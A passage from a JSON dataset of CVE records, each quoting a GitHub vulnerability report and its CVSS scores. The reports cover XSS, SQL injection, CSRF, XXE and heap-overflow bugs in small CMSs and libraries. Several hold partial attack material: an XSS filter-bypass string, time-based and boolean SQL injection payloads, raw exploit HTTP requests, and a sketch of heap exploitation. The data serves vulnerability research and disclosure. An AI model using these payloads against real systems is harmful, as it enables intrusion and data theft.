        "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG of application\" field found in the APITAG Configuration\" page in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG of application\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG When an unauthenticated user visits the page, the code gets executed: FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18475",
        "Issue_Url_old": "https://github.com/joelister/bug/issues/7",
        "Issue_Url_new": "https://github.com/joelister/bug/issues/7",
        "Repo_new": "joelister/bug",
        "Issue_Created_At": "2019-04-30T09:27:01Z",
        "description": "Persistent XSS on 'mes_title' field. APITAG first user inserts a malicious script into the header field of the outbox and sends it to other users. FILETAG APITAG other users open the email, the malicious code will be executed. FILETAG NUMBERTAG exp code\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18476",
        "Issue_Url_old": "https://github.com/joelister/bug/issues/9",
        "Issue_Url_new": "https://github.com/joelister/bug/issues/9",
        "Repo_new": "joelister/bug",
        "Issue_Created_At": "2019-04-30T09:57:02Z",
        "description": "SQL injection vulnerability in the \u201ccon_content\u201d field of Hucart cms NUMBERTAG After the user logs in, Hucart cms NUMBERTAG does not securely filter the avatar \"usd_image\" field in the basic information, resulting in a SQL injection vulnerability. FILETAG APITAG current page capture is as follows: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"usd_nick NUMBERTAG Content Disposition: form data; name=\"usd_image NUMBERTAG Content Disposition: form data; name=\"usd_truename NUMBERTAG Content Disposition: form data; name=\"usd_birthday NUMBERTAG Content Disposition: form data; name=\"usd_salt NUMBERTAG Content Disposition: form data; name=\"usd_msn\" EMAILTAG NUMBERTAG Content Disposition: form data; name=\"usd_qq NUMBERTAG Content Disposition: form data; name=\"usd_officephone NUMBERTAG Content Disposition: form data; name=\"usd_homephone NUMBERTAG Content Disposition: form data; name=\"usd_tel NUMBERTAG Content Disposition: form data; name=\"province NUMBERTAG Content Disposition: form data; name=\"city NUMBERTAG Content Disposition: form data; name=\"district NUMBERTAG Content Disposition: form data; name=\"pcd_all NUMBERTAG Content Disposition: form data; name=\"usd_address NUMBERTAG exp code: payload1:' WHERE NUMBERTAG AND NUMBERTAG SELECT (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE (SELECT NUMBERTAG UNION SELECT NUMBERTAG END)) APITAG payload2:' WHERE NUMBERTAG RLIKE SLEEP NUMBERTAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18477",
        "Issue_Url_old": "https://github.com/joelister/bug/issues/8",
        "Issue_Url_new": "https://github.com/joelister/bug/issues/8",
        "Repo_new": "joelister/bug",
        "Issue_Created_At": "2019-04-30T09:42:52Z",
        "description": "SQL injection vulnerability in the \u201ccon_content\u201d field of Hucart cms NUMBERTAG APITAG the user logs in, Hucart cms NUMBERTAG does not securely filter the message content \"con_content\" field in APITAG Consultation\", resulting in a SQL injection vulnerability. FILETAG APITAG current page capture is as follows POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG NUMBERTAG exp code Payload: con_title NUMBERTAG con_content= APITAG NUMBERTAG APITAG '||(SELECT NUMBERTAG d NUMBERTAG c FROM DUAL WHERE NUMBERTAG AND NUMBERTAG submit= %E NUMBERTAG F NUMBERTAG E4%BA%A4 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18544",
        "Issue_Url_old": "https://github.com/FeMiner/wms/issues/5",
        "Issue_Url_new": "https://github.com/feminer/wms/issues/5",
        "Repo_new": "feminer/wms",
        "Issue_Created_At": "2019-03-07T13:19:28Z",
        "description": "SQL Injection vulnerability in FILETAG !!!. A critical SQL Injection vulnerability was found in APITAG The parameter \"username\" is passed without filtering to SQL sentence which causes the vulnerability. Hackers can exploit it without authority to get access to your database FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18646",
        "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/5",
        "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/5",
        "Repo_new": "PearlyNautilus/Security-Code-Review",
        "Issue_Created_At": "2019-03-11T08:50:10Z",
        "description": "APITAG APITAG Disclosure Vuln. There are two Path Disclosure Vulnerabilities. Download: URLTAG NUMBERTAG Root path disclosure. Visit \" URLTAG \" to install it step by step, the installation is complete and then we can find root path as follows: FILETAG FILETAG view source: FILETAG NUMBERTAG Web path disclosure. URLTAG URLTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18648",
        "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/7",
        "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/7",
        "Repo_new": "PearlyNautilus/Security-Code-Review",
        "Issue_Created_At": "2019-03-12T10:00:51Z",
        "description": "APITAG NUMBERTAG CSRF Vuln. There is a CSRF vulnerability in APITAG NUMBERTAG endor: FILETAG EXP CODETAG Demo FILETAG FILETAG Fix Add a Token authentication...",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18648",
        "Issue_Url_old": "https://github.com/GodEpic/JuQingCMS/issues/1",
        "Issue_Url_new": "https://github.com/godepic/juqingcms/issues/1",
        "Repo_new": "godepic/juqingcms",
        "Issue_Created_At": "2019-03-14T08:21:02Z",
        "description": "Bug: APITAG NUMBERTAG CSRF NUMBERTAG Hi, I would like to report CSRF vulnerability in APITAG NUMBERTAG There is a CSRF vulnerability that can be added to modify administrator accounts. POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG URLTAG eg: APITAG modification FILETAG NUMBERTAG CSRF POC FILETAG FILETAG APITAG modification FILETAG fix: Sensitive operations require validation codes, and changing passwords requires validation of old passwords.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18657",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1310",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1310",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2019-05-05T09:11:28Z",
        "description": "Some security vulnerabilities in NUMBERTAG Some security vulnerabilities in NUMBERTAG any url redirection in function redirect Limited Reflective xss in function redirect Reflective xss in FILETAG Reflective xss in FILETAG the details of these vulnerabilities to see FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18661",
        "Issue_Url_old": "https://github.com/gnuboard/gnuboard5/issues/43",
        "Issue_Url_new": "https://github.com/gnuboard/gnuboard5/issues/43",
        "Repo_new": "gnuboard/gnuboard5",
        "Issue_Created_At": "2019-04-29T09:24:29Z",
        "description": "Some security vulnerabilities in NUMBERTAG Some security vulnerabilities in NUMBERTAG limited Reflective xss in FILETAG Reflective xss in FILETAG SQL injection in FILETAG the details of these vulnerabilities to see FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18670",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/7406",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/7406",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2020-05-29T04:29:34Z",
        "description": "security issue. I found some security issues in roundcobe NUMBERTAG I'm sorry I didn't find a way to submit a security issue, should I submit it directly via github issue?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18693",
        "Issue_Url_old": "https://github.com/MineWeb/MineWebCMS/issues/123",
        "Issue_Url_new": "https://github.com/mineweb/minewebcms/issues/123",
        "Repo_new": "mineweb/minewebcms",
        "Issue_Created_At": "2019-03-18T08:41:34Z",
        "description": "APITAG in APITAG Affected APITAG Type of vulnerability: XSS APITAG Discovered by: Ryan0lb details: Open this url \u201c URLTAG \u201c and login in FILETAG and Click the APITAG and view the News we can add a new article FILETAG We can control this parameter via \"title\",and we can insert the APITAG APITAG \" in title FILETAG finally,submit! The malicious javascript payload executed for it successlly FILETAG and open the article's url:\" URLTAG APITAG malicious javascript payload executed for it successlly too FILETAG Without any filtering on publish the article, we can easily trigger malicious XSS Payload and attack every visitor maliciously.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18694",
        "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/5",
        "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/5",
        "Repo_new": "ignitedcms/ignitedcms",
        "Issue_Created_At": "2019-03-28T09:20:36Z",
        "description": "There is one CSRF vulnerabilities that can change the user's password(include admin). There is one CSRF vulnerabilities that can change the user's password(include admin) Poc: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18698",
        "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/27",
        "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/27",
        "Repo_new": "talelin/lin-cms-flask",
        "Issue_Created_At": "2019-03-14T13:54:47Z",
        "description": "Login brute force Vulnerability in Latest Release. Hi, I would like to report login brute force vulnerability in latest release. Description: Login brute force vulnerability in PATHTAG NUMBERTAG line APITAG function. No need to limit the number of logins and set the verification code will cause the username and password to be brute force, like this: FILETAG author by jin. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18699",
        "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/28",
        "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/28",
        "Repo_new": "talelin/lin-cms-flask",
        "Issue_Created_At": "2019-03-14T14:10:04Z",
        "description": "Cross Site Scripting Vulnerability in Latest Release . Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in PATHTAG NUMBERTAG line APITAG function and PATHTAG NUMBERTAG line APITAG function. User name usage XSS payload will be executed in the log when registering users Steps To Reproduce: APITAG a user, the username is xss payload. FILETAG APITAG use the username login, see the log manager find the xss payload already executed, the super user also can find. FILETAG author by jin. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18701",
        "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/30",
        "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/30",
        "Repo_new": "talelin/lin-cms-flask",
        "Issue_Created_At": "2019-03-14T14:24:59Z",
        "description": "Identity authentication vulnerability in Latest Release. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Identity authentication vulnerability in the logout, When you log out, the authentication token is still valid. Steps To Reproduce: APITAG the background NUMBERTAG Do something, like list users APITAG APITAG packet, can see the user list. FILETAG author by jin. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18702",
        "Issue_Url_old": "https://github.com/rochacbruno/quokka/issues/675",
        "Issue_Url_new": "https://github.com/quokkaproject/quokka/issues/675",
        "Repo_new": "quokkaproject/quokka",
        "Issue_Created_At": "2019-03-21T08:21:29Z",
        "description": "Cross Site Scripting Vulnerability in Latest Release. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability PATHTAG NUMBERTAG line, Because there is no filter username. The vulnerability code is: CODETAG Steps To Reproduce: APITAG a user, username is xss payload, like: APITAG alert NUMBERTAG APITAG APITAG the username and Create user profile block, then trigger the payload. FILETAG FILETAG author by jin. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18703",
        "Issue_Url_old": "https://github.com/rochacbruno/quokka/issues/676",
        "Issue_Url_new": "https://github.com/quokkaproject/quokka/issues/676",
        "Repo_new": "quokkaproject/quokka",
        "Issue_Created_At": "2019-03-21T08:49:11Z",
        "description": "XML External Entity (XXE) Vulnerability in Latest Release. Hi, I would like to report XML External Entity (XXE) vulnerability in latest release. Description: XML External Entity (XXE) vulnerability in PATHTAG NUMBERTAG line and PATHTAG NUMBERTAG line, Because there is no filter authors, title. Steps To Reproduce: APITAG a article, title and authors can insert XML payload. APITAG the url: URLTAG {author}/index.rss URLTAG APITAG can see the title and authors has inserted into the XML. FILETAG FILETAG FILETAG author by jin. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18704",
        "Issue_Url_old": "https://github.com/fusionbox/django-widgy/issues/387",
        "Issue_Url_new": "https://github.com/fusionbox/django-widgy/issues/387",
        "Repo_new": "fusionbox/django-widgy",
        "Issue_Created_At": "2019-07-09T08:11:03Z",
        "description": "Unrestricted File Upload Vulnerability in demo site. Hi, I would like to report unrestricted file upload vulnerability in demo site. Description: Unrestricted File Upload Vulnerability in demo site image widget. Steps To Reproduce NUMBERTAG First in the page builder create a image widget and edit it. FILETAG NUMBERTAG Then upload file, you can upload any file you want. FILETAG NUMBERTAG Find you upload file URL FILETAG NUMBERTAG Open the URL you can see the page execution FILETAG author by jin. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18730",
        "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/4",
        "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/4",
        "Repo_new": "airpig2011/iec104",
        "Issue_Created_At": "2019-03-17T14:51:32Z",
        "description": "SEGV in function APITAG Hello. I built protocol IEC NUMBERTAG in my ubuntu NUMBERTAG machine with APITAG APITAG before make) . And I use prenny desock URLTAG tool to build channels socket communication to the console. But when I use the following as the input to the server socket APITAG , there will be a SEGV during the running. APITAG The run time error information is: ERRORTAG I use gdb to debug it and the information is as following: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18731",
        "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/5",
        "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/5",
        "Repo_new": "airpig2011/iec104",
        "Issue_Created_At": "2019-03-18T02:47:00Z",
        "description": "SEGV in function APITAG Hello. I built protocol IEC NUMBERTAG in my ubuntu NUMBERTAG machine with APITAG APITAG before make) . And I use [prenny desock NUMBERTAG tool to build channels socket communication to the console. But when I use the following as the input to the server socket NUMBERTAG there will be a SEGV during the running. APITAG The command line is as follows: PATHTAG ./iec NUMBERTAG monitor m server n NUMBERTAG test_input where APITAG is the lib of asan, APITAG is the lib of preeny desock APITAG is the binaray file which contains the test input The run time error information is: ERRORTAG I use gdb to debug it and the information is as following: CODETAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18734",
        "Issue_Url_old": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/476",
        "Issue_Url_new": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/476",
        "Repo_new": "eclipse-cyclonedds/cyclonedds",
        "Issue_Created_At": "2020-04-07T15:49:06Z",
        "description": "Stack buffer overflow was found at PATHTAG in nn_bitset_one.. I used Peach Fuzzer to fuzz the APITAG at PATHTAG After a period of time, A stack buffer overflow crash was found by APITAG Next is the full crash information. ERRORTAG I guess it is a potential vulnerability in cyclone project. Please detect whether it is a problem. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18735",
        "Issue_Url_old": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/501",
        "Issue_Url_new": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/501",
        "Repo_new": "eclipse-cyclonedds/cyclonedds",
        "Issue_Created_At": "2020-04-21T12:54:33Z",
        "description": "Heap buffer overflow was found at PATHTAG I used Peach Fuzzer to fuzz the APITAG at PATHTAG After a period of time, A heap buffer overflow crash was found by APITAG Next is the full crash information. ERRORTAG And this problem was found in version NUMBERTAG I guess the problem was in function APITAG I did the similar fuzz operation on version NUMBERTAG too, but the new version does not have this vulnerability. But I found some similar code around the vulnerability position in the new version. I am not sure why NUMBERTAG has the vulnerability and NUMBERTAG doe not have it.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18737",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2289",
        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2289",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-03-17T10:04:54Z",
        "description": "APITAG XSS to RCE. Tested On Windows NUMBERTAG ersion NUMBERTAG FILETAG XSS NUMBERTAG mermaid graph LR id1 FILETAG RCE NUMBERTAG mermaid graph LR id1 FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18741",
        "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/19",
        "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/19",
        "Repo_new": "thinksaas/thinksaas",
        "Issue_Created_At": "2019-03-18T12:48:35Z",
        "description": "Thinksns Overrides the Right to Modify the Photo Description of Albums thinksns\u8d8a\u6743\u4fee\u6539\u76f8\u518c\u56fe\u7247\u63cf\u8ff0. Thinksns Overrides the Right to Modify the Photo Description of Albums POST Packet: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: Your landing cookie APITAG Get parameters: Log in to demo on the official website, select an album: URLTAG enter an album: URLTAG click on an image: URLTAG photoid NUMBERTAG B NUMBERTAG D parameter is show parameter, and then replay the data package to change the description of other people's picture to photodesc NUMBERTAG B NUMBERTAG D parameter. PATHTAG thinksns\u8d8a\u6743\u4fee\u6539\u76f8\u518c\u56fe\u7247\u63cf\u8ff0 POST\u6570\u636e\u5305\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: \u4f60\u7684\u767b\u9646cookie APITAG \u83b7\u53d6\u53c2\u6570\uff1a\u5728\u5b98\u7f51demo\u767b\u9646\uff0c\u9009\u62e9\u4e00\u4e2a\u76f8\u518c\uff1a URLTAG \uff0c\u8fdb\u5165\u4e00\u4e2a\u76f8\u518c\uff1a URLTAG \uff0c\u5728\u70b9\u51fb\u4e00\u4e2a\u56fe\u7247\uff1a URLTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18746",
        "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/3",
        "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/3",
        "Repo_new": "kk98kk0/exploit",
        "Issue_Created_At": "2019-03-20T06:07:35Z",
        "description": "APITAG system background sql injection vulnerability. Vulnerability description Test object NUMBERTAG website name: APITAG NUMBERTAG web: FILETAG NUMBERTAG the download link address: URLTAG NUMBERTAG ersion: aitecms NUMBERTAG rar compression package decompression Test time: March NUMBERTAG Description of vulnerability: APITAG system background SQL injection vulnerability. Background management center online message remarks, SQL injection vulnerability > Parameter: MULTIPART id ((custom) POST) > Type: AND/OR time based blind > Title: APITAG NUMBERTAG AND time based blind POC and verification Local setup environment: Install APITAG guide: FILETAG NUMBERTAG Download URLTAG NUMBERTAG the background to URLTAG the password is admin/admin NUMBERTAG erify by the following POC verification methods. Bug: APITAG Verification method: APITAG APITAG ERRORTAG Vulnerability to prove: FILETAG FILETAG Reinforcement proposal\uff1a Improve the filter function Code review\uff1a Local building environment. PATHTAG APITAG Filter function line NUMBERTAG to submit content, imperfect. FILETAG Call APITAG to check $_REQUEST FILETAG Bypass APITAG checks, bypass addslashes function checks FILETAG Connect to a Database PATHTAG FILETAG PATHTAG FILETAG Bypass SQL security checks FILETAG Finally, the editor submitted successfully FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-18748",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2226",
        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2226",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-02-26T15:20:01Z",
        "description": "NUMBERTAG SS to RCE. Windows NUMBERTAG APITAG payload CODETAG PS. \u9700\u8981\u4f60\u70b9\u4e00\u4e0b FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18750",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/22",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/22",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-03-20T02:55:13Z",
        "description": "HEAP OVERFLOW VULNERABILITY. In APITAG !pst APITAG sizeof(tok3), &n3) || //sizeof(tok NUMBERTAG here n3 can be a value from NUMBERTAG to NUMBERTAG In APITAG APITAG tok NUMBERTAG n NUMBERTAG i); In APITAG if (n APITAG = APITAG { APITAG = APITAG NUMBERTAG APITAG = APITAG ) APITAG APITAG APITAG } map[code NUMBERTAG APITAG = code; APITAG = n NUMBERTAG The parameter n of void APITAG code, char APITAG int n, int offset) can be a bigger value than the the limited value APITAG In APITAG APITAG NUMBERTAG offset; Using the sample pdf file , we can find the VUL clearly. APITAG NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG f0 pwndbg> p APITAG NUMBERTAG c NUMBERTAG u NUMBERTAG len NUMBERTAG pwndbg> p APITAG NUMBERTAG so APITAG NUMBERTAG which makes the array Unicode APITAG as follows oob write. define APITAG NUMBERTAG struct APITAG { APITAG c; Unicode APITAG int len; }; So, we can modify memory from offset NUMBERTAG to NUMBERTAG with type unsigned int by adding the original value with offset, which can still be controlled. Local command execution is possible using heap fengshui, especially in the linux machine using glibc version NUMBERTAG Free a chunk using the bigger fake size can lead to continuously heap buf overflow, which can make the hacker get a memory containing the function pointer and then achieve the purpose of command execution.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
